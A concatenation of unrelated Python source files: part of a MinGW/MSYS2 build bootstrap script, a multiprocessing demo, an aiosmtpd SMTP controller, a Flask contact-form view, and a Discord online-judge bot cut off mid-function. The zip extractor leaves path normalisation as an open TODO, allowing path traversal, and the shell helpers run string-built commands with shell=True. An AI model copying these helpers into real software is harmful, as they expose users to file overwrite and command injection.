return '%s %s' % (h.hexdigest(), size)
class HashSizeCheckFailed(Exception):
'''Throw when downloaded file fails hash and size check.'''
pass
def getsecure(targetdir, filespec, quiet=False):
'''
Using description in `filespec` list, download
files from specified URL (if they don't exist)
and check that their size and sha-1 hash matches.
Files are downloaded into `targetdir`. `filespec`
is a list of entries, each entry is a dictionary
with obligatory keys: filename, hashsize and url.
filespec = [ {
'filename': 'wget.py',
'hashsize': '4eb39538d9e9f360643a0a0b17579f6940196fe4 12262',
'url': 'https://bitbucket.org/techtonik/python-wget/raw/2.0/wget.py'
} ]
    Raises HashSizeCheckFailed if hash/size check
    fails. Set quiet to True to suppress printing
    progress messages.
'''
# [-] no rollback
def check(filepath, shize):
"""Checking hash/size for the given file"""
if hashsize(filepath) != shize:
raise HashSizeCheckFailed(
'Hash/Size mismatch for %s\n exp: %s\n act: %s'
% (filepath, shize, hashsize(filepath)))
for entry in filespec:
filepath = join(targetdir, entry['filename'])
if exists(filepath):
if 'hashsize' not in entry:
if not quiet:
print("skipping - %-32s - downloaded, no hashsize" % entry['filename'])
continue
check(filepath, entry['hashsize'])
if not quiet:
print("skipping - %-32s - downloaded, hashsize ok" % entry['filename'])
continue
# file does not exists
if not quiet:
print("Downloading %s into %s" % (entry['filename'], targetdir))
urllib.urlretrieve(entry['url'], filepath)
if 'hashsize' not in entry:
if not quiet:
print("Hash/size is not set, skip check..")
continue
if not quiet:
print('Checking hash/size for %s' % filepath)
try:
check(filepath, entry['hashsize'])
except HashSizeCheckFailed:
# [x] remove file only if it was just downloaded
os.remove(filepath)
raise
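# Minimal usage sketch (hypothetical, not part of the bootstrap flow): getsecure()
# only needs an existing target directory and a filespec-style list of dicts; the
# entry below is the wget.py example from the docstring above.
def _example_getsecure(targetdir=LOOT):
    example_spec = [dict(
        filename='wget.py',
        hashsize='4eb39538d9e9f360643a0a0b17579f6940196fe4 12262',
        url='https://bitbucket.org/techtonik/python-wget/raw/2.0/wget.py',
    )]
    getsecure(targetdir, example_spec)  # downloads (if missing) and verifies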
def unzip(zippath, target, subdir=None, verbose=0):
'''extract entries from `subdir` of `zipfile` into `target/` directory'''
import os
from os.path import join, exists, dirname
import shutil
import zipfile
zf = zipfile.ZipFile(zippath)
dirs = set() # cache to speed up dir creation
for entry in zf.namelist():
# [ ] normalize entry (remove .. and / for security)
if subdir:
if not entry.startswith(subdir + '/'):
continue
else:
outfilename = join(target, entry.replace(subdir + '/', ''))
else:
outfilename = join(target, entry)
if outfilename.endswith('/'):
# directory entry
if not exists(outfilename):
os.makedirs(outfilename)
else:
# file entry
# some .zip files don't have directory entries
outdir = dirname(outfilename)
if (outdir not in dirs) and not exists(outdir):
os.makedirs(outdir)
dirs.add(outdir)
if verbose:
print(outfilename)
outfile = open(outfilename, "wb")
infile = zf.open(entry)
shutil.copyfileobj(infile, outfile)
outfile.close()
infile.close()
zf.close()
# from shellrun 2.0
import subprocess
class Result(object):
def __init__(self, command=None, retcode=None, output=None):
self.command = command or ''
self.retcode = retcode
self.output = output
self.success = False
if retcode == 0:
self.success = True
def run(command):
"""
Run `command` through shell and wait for it to complete.
stdin/stdout/stderr are shared with Python, so the output
is immediately visible and not captured. Returns Result
with command, retcode and success attributes.
- return code
- no stdout capture
- no stderr capture
- no deadlocks or MemoryError
- stdout, stderr and stdin are shared with Python process
┌─────────┐ ┌────────┐ ┌─────────┐
│ Parent │>─(stdin)─┬─>│ Python ├─────┬──(stdout)──>│ Parent │
│(console)│ │ │ script ├─────│┬─(stderr)──>|(console)│
└─────────┘ │ └────────┘ ││ └─────────┘
│ ┌────────────┐ ││
└─>│ Subprocess ├─┘│
│ (shell) ├──┘
└────────────┘
"""
process = subprocess.Popen(command, shell=True)
process.communicate()
return Result(command=command, retcode=process.returncode)
def run_capture_limited(command, maxlines=20000):
"""
Run `command` through a system shell, return last `maxlines`
as `output` string in Result object.
    res.output - captured output (the last `maxlines` lines)
    res.success - True if the command exited with code 0
    res.retcode - the command's return code
┌─────────┐ (stdin) ┌─────────────┐ ┌─────────┐
│ Parent │>──┬────>│ Python ├─(stdout)──>│ Parent │
│(console)│ │ │ script ├─(stderr)──>│(console)│
└─────────┘ │ └───────────^─┘ └─────────┘
│ ┌────────────┐ │
└─>│ Subprocess ├─┤ (buffer: stdout+stderr
│ (shell) ├─┘ limited to maxlines)
└────────────┘
[x] start reader thread
[x] reader: wait for lines
[x] wait for process to complete
[x] reader: wait for EOF
[ ] may not be a binary accurate read, because of \n split
and reassembly, needs testing
[ ] buffer size is line limited, test big streams without
newlines
[ ] need tests for missing output
[ ] process finished, pipe closed, did reader thread get
all the output? when pipe closes? is it possible to
miss the data?
[ ] access local buffer from outside
[ ] show current buffer contents if needed
[ ] show current line count if needed
"""
import collections
import threading
lines = collections.deque(maxlen=maxlines)
def reader_thread(stream, lock):
for line in stream:
if not PY3K:
lines.append(line)
else:
# the only safe way to decode *any* binary data to
# string http://stackoverflow.com/a/27527728/239247
lines.append(line.decode('cp437'))
outpipe = subprocess.PIPE
errpipe = subprocess.STDOUT
process = subprocess.Popen(command, shell=True, stdout=outpipe,
stderr=errpipe)
lock = threading.Lock()
thread = threading.Thread(target=reader_thread, args=(process.stdout, lock))
thread.start()
# With communicate() we get in thread:
# ValueError: I/O operation on closed file
# or in main thread
# IOError: close() called during concurrent operation on the same file object.
#out, _ = process.communicate()
process.wait()
thread.join()
return Result(command=command,
retcode=process.returncode,
output=''.join(lines))
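# Minimal usage sketch (assumes `echo` is available in the system shell): both
# helpers return a Result object; only run_capture_limited() captures output.
def _example_shellrun():
    r = run('echo visible immediately')                   # output goes straight to the console
    c = run_capture_limited('echo captured', maxlines=5)  # output kept in c.output
    return r.success, c.success, c.output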
# ---[ /utilities ]---
if __name__ == '__main__':
print('---[ download dependencies ]---')
getsecure(LOOT, filespec)
print('---[ unpack dependencies ]---')
def unzip_if_not_exists(archive, path):
if exists(LOOT + path):
print('(skip) %s is unpacked' % path)
else:
print('Unpacking %s from %s' % (path, archive))
            unzip(LOOT + archive, LOOT + path)
# unpacking 7zip
filename = filespec.pop(0)['filename']
if '7z' not in filename:
sys.exit('Error: 7zip entry must be the first in filespec')
unzip_if_not_exists(filename, '7zip')
cmd7zip = os.path.normpath(LOOT + '7zip/7za.exe')
# unpacking everything else
for entry in filespec:
fname = entry['filename']
targetdir = LOOT
if 'unpackto' in entry:
targetdir += entry['unpackto']
unpacked = exists(LOOT + entry['check'])
if unpacked:
print('(skip) %s is unpacked' % fname)
else:
if 'unpackto' in entry:
print('unpacking %s to %s' % (fname, entry['unpackto']))
else:
print('unpacking %s' % fname)
if fname.endswith('.zip'):
unzip(LOOT + fname, targetdir)
else:
if fname.endswith('.tar.gz') or fname.endswith('.tar.xz') or fname.endswith('.txz'):
cmd = '"%s" x -so "%s" | "%s" x -y -si -ttar -o"%s"' % (cmd7zip, LOOT + fname, cmd7zip, targetdir)
else:
cmd = '"%s" x -y -bd -o"%s" "%s"' % (cmd7zip, targetdir, LOOT + fname)
r = run_capture_limited(cmd, maxlines=10)
if not r.success:
print('error: command failed')
print(' %s' % r.command)
print('output:')
for line in r.output.splitlines():
print(' '+line)
sys.exit(-1)
print('---[ running checks ]---')
if ' ' in os.getcwd():
# MSYS2 is sensitive to spaces in paths
sys.exit('check failed: current path contains spaces')
print('---[ configure MSYS2 ]---')
MSYS2 = LOOT + '/msys32/usr/bin'
def bash(command):
return run(MSYS2 + '/bash --login -c "{}"'.format(command))
# do first time setup
bash('exit')
# update pacman database
bash('pacman -Sy')
# install packages
res = bash('pacman -S --noconfirm git subversion tar zip p7zip make patch automake libtool bison gettext-devel wget sshpass texinfo')
# check that gcc is not installed
res = bash('gcc -v 2> /dev/null')
if res.retcode != 127:
sys.exit('check failed: gcc is installed')
print('')
print('---[ cloning custom mingw-build scripts ]---')
bash('git clone -b mingwpy-dev https://github.com/mingwpy/mingw-builds.git')
print('')
print('---[ running 32-bit build ]---')
bash("""cd mingw-builds; ./build --mode=gcc-5.3.0 --static-gcc --arch=i686 --march-x32='pentium4' \
--mtune-x32='generic' --buildroot=/tmp/i686 --rev=201603 --rt-version=trunk \
--threads=win32 --exceptions=sjlj --enable-languages=c,c++,fortran --fetch-only""")
|
DEMO_multi_processing.py
|
import time
import numpy as np
import multiprocessing as mp
"""An Tutorial of multi-processing (a Python built-in library)
"""
def func_pipe1(conn, p_id):
print(p_id)
time.sleep(0.1)
conn.send(f'{p_id}_send1')
print(p_id, 'send1')
time.sleep(0.1)
conn.send(f'{p_id}_send2')
print(p_id, 'send2')
time.sleep(0.1)
rec = conn.recv()
print(p_id, 'recv', rec)
time.sleep(0.1)
rec = conn.recv()
print(p_id, 'recv', rec)
def func_pipe2(conn, p_id):
print(p_id)
time.sleep(0.1)
conn.send(p_id)
print(p_id, 'send')
time.sleep(0.1)
rec = conn.recv()
print(p_id, 'recv', rec)
def func1(i):
time.sleep(1)
print(f'args {i}')
def func2(args): # multiple parameters (arguments)
# x, y = args
x = args[0] # write in this way, easier to locate errors
y = args[1] # write in this way, easier to locate errors
time.sleep(1) # pretend it is a time-consuming operation
return x - y
def run__pool(): # main process
from multiprocessing import Pool
cpu_worker_num = 3
process_args = [(1, 1), (9, 9), (4, 4), (3, 3), ]
print(f'| inputs: {process_args}')
start_time = time.time()
with Pool(cpu_worker_num) as p:
outputs = p.map(func2, process_args)
print(f'| outputs: {outputs} TimeUsed: {time.time() - start_time:.1f} \n')
    '''Another way (I don't recommend it):
    using 'functools.partial'. See https://stackoverflow.com/a/25553970/9293137
    # from functools import partial
    # pool.map(partial(f, a, b), iterable)
    A sketch of this variant is given in run__pool_partial() below.
    '''
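# Sketch of the functools.partial variant referenced in run__pool() above.
# _sub_two_args is a hypothetical helper added only for this demo; it must live at
# module level so that the worker processes can pickle it.
def _sub_two_args(x, y):
    return x - y
def run__pool_partial():
    from functools import partial
    from multiprocessing import Pool
    with Pool(2) as p:
        outputs = p.map(partial(_sub_two_args, 10), [1, 2, 3])  # 10-1, 10-2, 10-3
    print(f'| partial outputs: {outputs}')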
def run__process(): # mp: multiprocessing
from multiprocessing import Process
process = [Process(target=func1, args=(1,)),
Process(target=func1, args=(2,)), ]
[p.start() for p in process]
[p.join() for p in process]
def run__pipe():
from multiprocessing import Process, Pipe
conn1, conn2 = Pipe()
process = [Process(target=func_pipe1, args=(conn1, 'I1')),
Process(target=func_pipe2, args=(conn2, 'I2')),
Process(target=func_pipe2, args=(conn2, 'I3')), ]
[p.start() for p in process]
print('| Main', 'send')
conn1.send(None)
print('| Main', conn2.recv())
[p.join() for p in process]
def run__queue():
from multiprocessing import Process, Queue
queue = Queue(maxsize=4) # the following attribute can call in parent(main) or child process, just like 'Pipe'
queue.put(True)
queue.put([0, None, object]) # you can put deepcopy thing
queue.qsize() # the length of queue
print(queue.get()) # First In First Out
print(queue.get()) # First In First Out
queue.qsize() # the length of queue
process = [Process(target=func1, args=(queue,)),
Process(target=func1, args=(queue,)), ]
[p.start() for p in process]
[p.join() for p in process]
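# Hypothetical companion to run__queue(): a consumer that actually reads from the
# queue in a child process (func1 above only prints the queue object it receives).
def func_queue_consumer(q):
    while True:
        item = q.get()    # blocks until the parent puts something
        if item is None:  # use None as a stop signal
            break
        print('consumer got', item)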
if __name__ == '__main__':  # the entry point must be guarded when spawning processes (e.g. on Windows)
# run__process()
# run__pool()
run__pipe()
|
controller.py
|
import os
import asyncio
import threading
from aiosmtpd.smtp import SMTP
from public import public
from typing import Any, Dict
@public
class Controller:
def __init__(self, handler, loop=None, hostname=None, port=8025, *,
ready_timeout=1.0, enable_SMTPUTF8=True, ssl_context=None,
server_kwargs: Dict[str, Any] = None):
"""
`Documentation can be found here
<http://aiosmtpd.readthedocs.io/en/latest/aiosmtpd\
/docs/controller.html#controller-api>`_.
"""
self.handler = handler
self.hostname = '::1' if hostname is None else hostname
self.port = port
self.enable_SMTPUTF8 = enable_SMTPUTF8
self.ssl_context = ssl_context
self.loop = asyncio.new_event_loop() if loop is None else loop
self.server = None
self._thread = None
self._thread_exception = None
        self.ready_timeout = float(os.getenv(
            'AIOSMTPD_CONTROLLER_TIMEOUT', ready_timeout))
self.server_kwargs: Dict[str, Any] = server_kwargs or {}
def factory(self):
"""Allow subclasses to customize the handler/server creation."""
return SMTP(self.handler, enable_SMTPUTF8=self.enable_SMTPUTF8,
**self.server_kwargs)
def _run(self, ready_event):
asyncio.set_event_loop(self.loop)
try:
self.server = self.loop.run_until_complete(
self.loop.create_server(
self.factory, host=self.hostname, port=self.port,
ssl=self.ssl_context))
except Exception as error: # pragma: nowsl
# Somehow WSL1.0 (Windows Subsystem for Linux) allows multiple
# listeners on one port?!
# That is why we add "pragma: nowsl" there, so when testing on
# WSL we can specify "PLATFORM=wsl".
self._thread_exception = error
return
self.loop.call_soon(ready_event.set)
self.loop.run_forever()
self.server.close()
self.loop.run_until_complete(self.server.wait_closed())
self.loop.close()
self.server = None
def start(self):
assert self._thread is None, 'SMTP daemon already running'
ready_event = threading.Event()
self._thread = threading.Thread(target=self._run, args=(ready_event,))
self._thread.daemon = True
self._thread.start()
# Wait a while until the server is responding.
ready_event.wait(self.ready_timeout)
if self._thread_exception is not None: # pragma: nowsl
# See comment about WSL1.0 in the _run() method
raise self._thread_exception
def _stop(self):
self.loop.stop()
try:
_all_tasks = asyncio.Task.all_tasks
except AttributeError: # pragma: skipif_lt_py39
_all_tasks = asyncio.all_tasks
for task in _all_tasks(self.loop):
task.cancel()
def stop(self):
assert self._thread is not None, 'SMTP daemon not running'
self.loop.call_soon_threadsafe(self._stop)
self._thread.join()
self._thread = None
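# Minimal usage sketch (assumes the built-in aiosmtpd.handlers.Sink handler); it is
# not part of the Controller API above and is never called here.
def _example_usage():
    from aiosmtpd.handlers import Sink
    controller = Controller(Sink(), hostname='127.0.0.1', port=8025)
    controller.start()   # SMTP server now runs in a background thread
    controller.stop()    # shut the loop down and join the thread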
|
views.py
|
from app import app
import logging
logging.basicConfig(level=logging.DEBUG)
from flask import Flask, render_template, request, redirect, url_for, flash, jsonify
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, TextAreaField
from wtforms.validators import DataRequired, Email
from flask_mail import Mail, Message
from threading import Thread
import os
app.config['SECRET_KEY'] = os.environ.get('SECRET_KEY')
app.config['CONTACT_SUBJECT_PREFIX'] = '[PORTFOLIO SITE CONTACT FORM]'
app.config['MAIL_SERVER'] = 'smtp.googlemail.com'
app.config['MAIL_PORT'] = 587
app.config['MAIL_USE_TLS'] = True
app.config['MAIL_USERNAME'] = os.environ.get('MAIL_USERNAME')
app.config['MAIL_PASSWORD'] = os.environ.get('MAIL_PASSWORD')
app.config['MAIL_SENDER'] = os.environ.get('MAIL_SENDER')
app.config['ADMIN_EMAIL'] = os.environ.get('ADMIN_EMAIL')
app.config['NAME'] = os.environ.get('NAME')
mail=Mail(app)
def create_email_from_form(subject, template, **formdata):
message= Message(subject=subject,
recipients=[app.config['ADMIN_EMAIL']],
sender=app.config['MAIL_SENDER'])
message.body = render_template(template + '.txt', **formdata)
message.html = render_template(template + '.html', **formdata)
return message
def send_email(message):
thread = Thread(target=send_async_email, args=[app, message])
thread.start()
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
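# Minimal usage sketch (hypothetical values): build the message from template data,
# then hand it to send_email(), which returns immediately while mail.send() runs in
# a background thread inside the app context:
#
#   msg = create_email_from_form('[TEST] hello', 'contactemail',
#                                name='Ada', email='ada@example.com',
#                                message='Hi there')
#   send_email(msg)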
class ContactForm(FlaskForm):
name = StringField('What is your name?', validators=[DataRequired()])
email = StringField('What is your email?', validators=[DataRequired(), Email()])
message = TextAreaField('What is your message?', validators=[DataRequired()])
submit = SubmitField('Send')
@app.route("/")
def home():
return render_template("index.html", title="Home", name=app.config['NAME'])
@app.route("/posts")
def posts():
return render_template("posts.html", title="Posts", name=app.config['NAME'])
@app.route("/about")
def about():
return render_template("about.html", title="About", name=app.config['NAME'])
@app.route("/projects")
def projects():
return render_template("projects.html", title="Projects", name=app.config['NAME'])
@app.route("/contact", methods=['GET', 'POST'])
def contact():
logging.info('Contact page')
form = ContactForm()
if form.validate_on_submit():
logging.info('Form validated')
if app.config['ADMIN_EMAIL']:
logging.info('trying to send email to ' + app.config['ADMIN_EMAIL'])
email = create_email_from_form(app.config['CONTACT_SUBJECT_PREFIX'], 'contactemail', name=form.name.data, email=form.email.data, message=form.message.data)
logging.info('email created')
            send_email(email)
            logging.info('email send thread started')
return redirect(url_for('contact'))
else:
logging.info("form did not validate on submit")
return render_template("contact.html", title="Contact", form=form, name=app.config['NAME'])
|
main.py
|
# Online Judge Discord Bot
# Main python executable
import time
import discord
import os
import sys
import subprocess
import math
import dns
import asyncio
import judging
import contests
import requests
import secrets
import string
import grpc
import judge_pb2
import judge_pb2_grpc
import uuid
import hashlib
import ProblemUpload
from multiprocessing import Process
from multiprocessing import Manager
from google.cloud import storage
from functools import cmp_to_key
from pymongo import MongoClient
client = discord.Client()
def writeCode(source, filename):
f = open(filename, "w")
f.write(source)
f.close()
def clearFile(filename):
os.remove(filename)
def clearSources(judgeNum):
try:
clearFile("Judge" + str(judgeNum) + "/data.out")
except:
print("Failed to remove output file")
def decode(cde):
if cde == 0:
return "Available"
elif cde == 1:
return "Submission in Progress"
elif cde == 2:
return "Offline"
else:
return ""
def generatePassword():
alphabet = string.ascii_letters + string.digits
password = ''.join(secrets.choice(alphabet) for i in range(13))
return password
def clean(src):
return src.replace("`", "")
def getLen(contest):
return settings.find_one({"type":"contest", "name":contest})['len']
def perms(found, author):
acc = settings.find_one({"type":"access", "mode":found['contest'], "name":author})
if (not settings.find_one({"type":"access", "mode":"owner", "name":author}) is None):
return False # Has owner perms
if (not settings.find_one({"type":"access", "mode":"admin", "name":author}) is None) and (author in found['authors']):
return False # Has admin perms
elif (not acc is None) and (found['status'] == "s") and contests.compare(acc['start'], contests.current_time()) <= getLen(found['contest']):
return False # Has contest participant perms
return (not found['published']) or (found['status'] != "s")
def getStatus():
msg = ""
for x in settings.find({"type":"judge"}):
msg += "Judge #" + str(x['num']) + ": " + decode(x['status']).ljust(23)
if x['status'] != 2:
msg += "(" + x['runtimes'] + ")"
msg += "\n"
return msg
async def updateStatus():
msg = getStatus()
global status
try:
await status.edit(content = ("**Current live judge server statuses:**\n```" + getStatus() + "\n```"))
except:
print("Failed to update live status")
return
def amt(len):
h = len // 3600
len %= 3600
m = len // 60
len %= 60
s = len
return "{hh} hours, {mm} minutes, and {ss} seconds".format(hh = h, mm = m, ss = s)
def profile(name):
prof = settings.find_one({"type":"profile", "name":name})
if prof is None:
return (name + " has not solved any problems yet.")
a = "Problems fully solved by `" + name + "`:\n```"
cnt = 0
for x in prof['solved']:
p = settings.find_one({"type":"problem", "name":x})
if p is None or not p['published']:
continue
a += x + " (" + str(p['points']) + " points)\n"
cnt += 1
if cnt <= 0:
return (name + " has not solved any problems yet.")
return a + "```" + str(cnt) + " problems solved in total"
def addToProfile(name, problem):
if settings.find_one({"type":"profile", "name":name}) is None:
settings.insert_one({"type":"profile", "name":name, "solved":[]})
settings.update_one({"type":"profile", "name":name}, {"$addToSet":{"solved":problem}})
def cmp(a, b):
if a[1] != b[1]:
return b[1] - a[1]
return a[2] - b[2]
def cmpProblem(a, b):
return a[0] - b[0]
def getScoreboard(contest):
ct = settings.find_one({"type":"contest", "name":contest})
if ct is None:
return "Contest not found!"
time_bonus = ct['has-time-bonus']
penalty = ct['has-penalty']
fnd = settings.find({"type":"access", "mode":contest})
arr = [x for x in fnd]
msg = "**Current rankings for participants in contest `" + contest + "`**\n```"
cnt = 0
namWid = 0
pWid = [0] * (ct['problems'] + 1)
comp = []
for x in arr:
namWid = max(namWid, len(x['name']))
for y in range(1, len(x['solved'])):
dt = "P" + str(y) + "-" + str(x['solved'][y])
if time_bonus and x['time-bonus'][y] > 0:
dt += "(+" + str(x['time-bonus'][y]) + ")"
if penalty and x['penalty'][y] > 0:
dt += "(" + str(x['penalty'][y]) + ")"
pWid[y] = max(pWid[y], len(dt))
for x in arr:
m = x['name'].ljust(namWid) + " : "
total = 0
for y in range(1, len(x['solved'])):
dt = "P" + str(y) + "-" + str(x['solved'][y])
if time_bonus and x['time-bonus'][y] > 0:
dt += "(+" + str(x['time-bonus'][y]) + ")"
if penalty and x['penalty'][y] > 0:
dt += "(" + str(x['penalty'][y]) + ")"
m += dt.ljust(pWid[y]) + " "
total += x['solved'][y] + x['time-bonus'][y]
m += "total: " + str(total)
comp.append((m, total, sum(x['penalty'])))
comp.sort(key = cmp_to_key(cmp))
idx = 0
cur = 0
for i in range(len(comp)):
cur += 1
if i == 0 or comp[i - 1][1] != comp[i][1] or comp[i - 1][2] != comp[i][2]:
idx = cur
msg += str(idx) + ") " + comp[i][0] + "\n"
if len(comp) <= 0:
msg += "---No participants are in this contest yet---\n"
return msg + "```"
async def live_scoreboard(contest):
global scb
current_contest = settings.find_one({"type":"livecontests"})['arr']
for x in range(len(current_contest)):
if current_contest[x] == contest:
await scb[x].edit(content = getScoreboard(contest))
return
print("Failed to update live scoreboard")
def get_bonus(rem, pts):
return (pts * rem) // 30000
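# Worked example for get_bonus(): with 15000 seconds remaining and a 100-point
# problem, the bonus is (100 * 15000) // 30000 = 50 extra points; it shrinks
# linearly as the remaining time goes to zero.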
async def updateScore(contest, problem, user, score, ct):
post = settings.find_one({"type":"access", "name":user, "mode":contest})
if post is None:
print("Failed to update score (no access post)")
return
elapsed = contests.compare(post['start'], ct)
contest_len = getLen(contest)
if elapsed > contest_len:
print("Invalid score update")
return
arr = post['solved']
penalty = post['penalty']
time_bonus = post['time-bonus']
num = int(problem[len(problem) - 1])
if score <= arr[num] and arr[num] < 100:
penalty[num] += 1
if arr[num] < 100:
settings.update_one({"_id":post['_id']}, {"$set":{"taken":elapsed}})
arr[num] = max(arr[num], score)
time_bonus[num] = max(time_bonus[num], get_bonus(contest_len - elapsed, score))
settings.update_one({"_id":post['_id']}, {"$set":{"solved":arr, "penalty":penalty, "time-bonus":time_bonus}})
await live_scoreboard(contest)
def remaining(name):
acc = settings.find({"type":"access", "name":name})
msg = ""
for x in acc:
if x['mode'] != "admin" and x['mode'] != "owner":
try:
total = getLen(x['mode'])
elapsed = contests.compare(x['start'], contests.current_time())
rem = total - elapsed
if rem <= 0:
msg += "Time's up! `" + name + "`'s participation in contest `" + x['mode'] + "` has ended.\n"
else:
msg += "`" + name + "` still has `" + amt(rem) + "` left on contest `" + x['mode'] + "`\n"
except:
pass
if len(msg) == 0:
return "`" + name + "` has not joined any contests"
return msg
async def sendLiveScoreboards():
current_contest = settings.find_one({"type":"livecontests"})['arr']
global scb
scb = [None] * len(current_contest)
sbc = client.get_channel(852311780378148914)
await sbc.purge(limit = 100)
for x in range(len(current_contest)):
scb[x] = await sbc.send(getScoreboard(current_contest[x]))
def runSubmission(judges, username, cleaned, lang, problm, attachments, return_dict):
with grpc.insecure_channel(judges['ip'] + ":" + str(judges['port'])) as channel:
stub = judge_pb2_grpc.JudgeServiceStub(channel)
response = stub.judge(judge_pb2.SubmissionRequest(username = username, source = cleaned, lang = lang, problem = problm['name'], attachment = attachments))
finalscore = response.finalScore
return_dict['finalscore'] = finalscore
def hashCode(password):
salt = uuid.uuid4().hex
return hashlib.sha256(salt.encode() + password.encode()).hexdigest() + ':' + salt
def check_equal(hashed_password, user_password):
password, salt = hashed_password.split(':')
return password == hashlib.sha256(salt.encode() + user_password.encode()).hexdigest()
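# Minimal sketch of the salted-hash round trip implemented above (hypothetical
# password; nothing is stored, the function is never called here):
def _example_password_roundtrip():
    stored = hashCode("hunter2")                # "sha256hex:salt"
    assert check_equal(stored, "hunter2")       # the same password verifies
    assert not check_equal(stored, "hunter3")   # a different password does not
    return stored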
@client.event
async def on_ready():
await client.change_presence(activity=discord.Activity(type=discord.ActivityType.listening, name="-help"))
global storage_client
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = 'google-service-key.json'
stc = storage.Client()
storage_client = stc.get_bucket('discord-bot-oj-file-storage')
pswd = os.getenv("PASSWORD")
cluster = MongoClient(pswd)
db = cluster['database']
global settings
settings = db['settings']
global running
running = True
global status
stat = client.get_channel(851468547414294568)
await stat.purge(limit = 100)
status = await stat.send("**Current live judge server statuses:**\n```" + getStatus() + "\n```")
await sendLiveScoreboards()
print(f'{client.user} has connected to Discord!')
async def handleSubmission(message):
first = True
while True:
req = None
channel = None
author = None
if first:
req = settings.find_one({"type":"req", "user":str(message.author), "used":False})
channel = message.channel
author = str(message.author)
else:
req = settings.find_one({"type":"queued"})
channel = client.get_channel(req['channel'])
author = req['user']
if not str(message.content).startswith("-") and (not req is None):
try:
ct = contests.current_time()
username = req['user']
problem = req['problem']
lang = req['lang']
settings.delete_one({"type":"prev", "name":username})
settings.insert_one({"type":"prev", "name":username, "problem":problem, "lang":lang})
problm = settings.find_one({"type":"problem", "name":problem})
await updateStatus()
cleaned = ""
attachments = False
if not first:
cleaned = req['cleaned']
attachments = req['attachments']
else:
if message.attachments:
cleaned = message.attachments[0].url
attachments = True
else:
# Clean up code from all backticks
cleaned = clean(str(message.content))
judges = None
if first and "judge" in req:
judges = settings.find_one({"type":"judge", "num":req['judge']})
if first and "judge" in req and not judges is None and judges['status'] == 0:
judges = settings.find_one({"type":"judge", "num":req['judge']})
else:
judges = settings.find_one({"type":"judge", "status":0})
if judges is None:
settings.update_one({"_id":req['_id']}, {"$set":{"type":"queued", "channel":message.channel.id, "cleaned":cleaned, "attachments":attachments}})
await message.channel.send("Submission queued: Waiting for a suitable judge to process your submission. Please wait a few seconds.")
return True
avail = judges['num']
settings.update_one({"_id":req['_id']}, {"$set":{"used":True}})
settings.update_one({"_id":judges['_id']}, {"$set":{"status":1}})
settings.delete_one({"_id":req['_id']})
await updateStatus()
settings.insert_one({"type":"use", "author":str(author), "message":cleaned})
await channel.send("Now judging your program. See execution results below.")
manager = Manager()
return_dict = manager.dict()
rpc = Process(target = runSubmission, args = (judges, username, cleaned, lang, problm, attachments, return_dict,))
rpc.start()
msgContent = "```Waiting for response from Judge " + str(avail) + "```"
curmsg = await channel.send(msgContent)
while rpc.is_alive():
newcontent = settings.find_one({"type":"judge", "num":avail})['output']
if newcontent != msgContent and len(newcontent) > 0:
msgContent = newcontent
try:
await curmsg.edit(content = msgContent)
except:
print("Edited empty message")
await asyncio.sleep(0.5)
try:
finalscore = return_dict['finalscore']
await curmsg.edit(content = settings.find_one({"type":"judge", "num":avail})['output'])
if finalscore == 100:
addToProfile(author, problem)
if len(problm['contest']) > 0 and finalscore >= 0:
await updateScore(problm['contest'], problem, author, finalscore, ct)
except Exception as e:
await channel.send("Judging error: Fatal error occured on Judge Server " + str(avail) + " while grading solution")
print(e)
settings.update_one({"_id":judges['_id']}, {"$set":{"output":""}})
except Exception as e:
await channel.send("Judging error: Fatal error occured while grading solution\n```" + str(e) + "\n```")
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print(exc_type, fname, exc_tb.tb_lineno)
settings.update_one({"_id":judges['_id']}, {"$set":{"status":0}})
await updateStatus()
first = False
else:
break
return not first
@client.event
async def on_message(message):
if message.author == client.user:
return
global settings
global running
global status
global storage_client
if str(message.content).startswith("-"):
for x in settings.find({"type":"command"}):
if str(message.content).startswith(x['name']):
settings.insert_one({"type":"use", "author":str(message.author), "message":str(message.content)})
break
if not await handleSubmission(message):
if len(str(message.content)) <= 0:
return
if message.content == "-help":
await message.channel.send("**Here are some of my commands:**")
f = open("commands.txt", "r")
await message.channel.send("```" + str(f.read()) + "```")
elif message.content.startswith("-problem"):
w1 = 14
out = "Problem Name".ljust(w1) + "Difficulty\n"
out += "-----------------------------------------------\n"
arr = sorted([(x['points'], x['name']) for x in settings.find({"type":"problem", "published":True})], key = cmp_to_key(cmpProblem))
for x in arr:
out += x[1].ljust(w1) + (str(x[0]) + " points") + "\n"
out += "\n"
f = open("problems.txt", "r")
out += f.read()
f.close()
await message.channel.send("All published problems:\n```\n" + out + "```")
elif str(message.content).split()[0].startswith("-sub"):
arr = str(message.content).split()
if len(arr) < 3:
await message.channel.send("Incorrect formatting for submit command. Please type `-submit [problemName] [language]` and wait for the judge to prompt you for your source code.")
return
problem = arr[1].lower()
language = arr[2].lower()
found = settings.find_one({"type":"problem", "name":problem})
if found is None or (perms(found, str(message.author))):
await message.channel.send("Judging Error: Problem not found. The problem may either be private or does not exist.")
return
lang = settings.find_one({"type":"lang", "name":language})
if lang is None:
await message.channel.send("Judging Error: Language not Found. Type `-langs` for a list of supported languages.")
return
judge = 0
if not settings.find_one({"type":"access", "mode":"admin", "name":str(message.author)}) is None and len(arr) > 3:
try:
judge = int(arr[3])
except:
pass
settings.insert_one({"type":"req", "user":str(message.author), "problem":problem, "lang":language, "used":False, "judge":judge})
await message.channel.send("Submission request received from `" + str(message.author) + "` for problem `" + problem + "` in `" + language + "`.\nSend your source code either as an attachment or a message surrounded by backticks (`).")
elif str(message.content).startswith("-rs"):
arr = str(message.content).split()
prev = settings.find_one({"type":"prev", "name":str(message.author)})
if prev is None:
await message.channel.send("No previous submission found. Please type `-submit [problemName] [language]` to submit a submission.")
return
if perms(settings.find_one({"type":"problem", "name":prev['problem']}), str(message.author)):
await message.channel.send("Judging Error: Problem not found. The problem may either be private or does not exist.")
return
language = None
if len(arr) < 2:
settings.insert_one({"type":"req", "user":str(message.author), "problem":prev['problem'], "lang":prev['lang'], "used":False})
language = prev['lang']
else:
lang = settings.find_one({"type":"lang", "name":arr[1]})
if lang is None:
await message.channel.send("Judging Error: Language not Supported. Type `-langs` for a list of supported languages.")
return
settings.insert_one({"type":"req", "user":str(message.author), "problem":prev['problem'], "lang":arr[1], "used":False})
language = arr[1]
